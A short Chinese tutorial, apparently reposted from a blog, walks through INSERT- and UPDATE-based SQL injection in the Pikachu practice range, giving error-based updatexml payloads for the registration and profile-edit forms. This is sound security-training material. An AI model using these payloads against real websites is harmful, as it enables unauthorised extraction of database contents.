本文共 701 字,大约阅读时间需要 2 分钟。
实验环境:
皮卡丘靶场—insert/update注入原理:
insert注入(注册新用户):
后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(username, pw, sex, phonenum, email, address) value (‘1’ or updatexml(1, concat(0x7e, database()),0) or '’, 1111, 1, 2, 3, 4)update注入(用户更新信息)
实验步骤:
insert注入(用户注册):
(1). 注册信息,在用户栏输入危险字符’,并查看报错信息: (2). 设计payload,并输入到存在SQL注入的地方: aaaa’ or updatexml(1, concat(0x7e, database()),0) or ’ 同理可以将database()替换成version(), user()和select查询语句(与上一节课一样);update注入(修改信息):
(1)输入用户名密码登录lucy/123456,在点击修改个人信息: (2)写入payload:aaa’ or updatexml(1, concat(0x7e, database()),0) or’转载地址:http://osfmf.baihongyu.com/